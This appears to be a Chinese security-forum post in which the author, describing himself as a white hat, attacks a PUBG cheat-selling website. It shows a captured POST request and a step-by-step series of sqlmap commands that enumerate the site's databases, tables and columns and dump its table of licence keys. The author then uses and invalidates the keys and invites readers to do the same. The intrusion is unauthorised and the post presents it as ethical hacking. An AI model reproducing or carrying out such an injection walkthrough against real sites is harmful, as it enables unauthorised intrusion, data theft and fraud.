作为当下热度极高的竞技游戏,《绝地求生》的外挂产业已经形成了一条庞大的产业链,从招商到研发再到代理发售一气呵成。
外挂到底出神入化到什么程度?
几天前下了班,约上二三好友,信心满满打开游戏准备吃个鸡的时候,遇到的确是这样的:
腾空飞天术:
高速匍匐前进术:
百步穿杨隔空打人术:
超远距离一枪爆头连环杀人术:
当然还更出神入化的功能,只有你想不到没有做不到:
怎么样?是不是一脸懵?游戏体验极差?
怎么办?举报+投诉?是个办法但并不符合一名白帽子的行事风格。
游戏退出来后我扭头就百度随便找了个吃鸡外挂网站。
sqlmap走起
这是一个post注入,我们把通过burp抓到的请求复制到一个txt文件里面,然后放到c盘根目录下。
POST /index.php/Home/Index/ajaxname HTTP/1.1[/size]
[size=3]Content-Length: 71[/size]
[size=3]Content-Type: application/x-www-form-urlencoded[/size]
[size=3]X-Requested-With: XMLHttpRequest[/size]
[size=3]Referer: [url]http://10.10.10.10/[/url][/size]
[size=3]Cookie: PHPSESSID=fhj6t4m3o79ov1n4dk36bn9413[/size]
[size=3]Host: 10.10.10.10[/size]
[size=3]Connection: Keep-alive[/size]
[size=3]Accept-Encoding: gzip,deflate[/size]
[size=3]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21[/size]
[size=3]Accept: */*[/size]
[size=3]name=-1
然后我们打开sqlmap 输入如下命令。
sqlmap.py -r c:.txt --data "name=-1"
当如下提示的时候,我们输入Y然后回车继续。
are you really sure that you want to continue (sqlmap could have problems)? [y/N]
稍等片刻后发现这里的确存在注入。
我们输入如下命令列出他的数据库名称
sqlmap.py -r c:.txt --data "name=-1" --dbs
可以看到数据库已经出来了,他这个网站的数据库是第一个。
输入如下命令读出表名字
sqlmap.py -r c:.txt --data "name=-1" -D _ka_打码 --tables
从下图可以看到,他的外挂卡密是存放在这个表里面。
输入以下命令读出这个表里面的所有字段
sqlmap.py -r c:.txt --data "name=-1" -D _ka_打码 -T zd_kami --columns
可以看到,所有字段都出来了。
直接导出所有卡密
输入如下命令导出这些字段
sqlmap.py -r c:.txt --data "name=-1" -D _ka_打码 -T zd_kami -C "" --dump
我的虚拟机是2003系统,我们找到如下路径C:Documents and SettingsAdministrator.sqlmapoutput 打开后发现刚刚下载的数据都在这里
其他系统的话可能路径不一样,但是注意观察sqlmap里面会有路径的提醒。
打开后我们注意观察每一个卡密的后面。0表示没有使用过,1表示已经被人使用。
剩下的你懂的,直接去下载他们的辅助,然后输入卡密即可。
然后我扔给几个朋友测试一下,果然能用,果断清洗了一遍,看你们怎么卖。
清洗完成后转身离去,深藏功与名。
我不希望绝地求生从玩家与玩家之间的竞技游戏,慢慢演变成了玩家与外挂之间的斗争。
希望蓝洞能大力打击这些外挂使用者!维护优良的网络环境,也祝大家游戏愉快,大吉大利,每晚吃鸡~
如果你也对相关技术感兴趣,或致力于成为一名白帽子做互联网安全的守护者,请关注我,会定期更新有用有趣的内容。
有任何问题或疑惑,下方留言即可,会认真回复每一条评论~
閱讀更多 i春秋論壇 的文章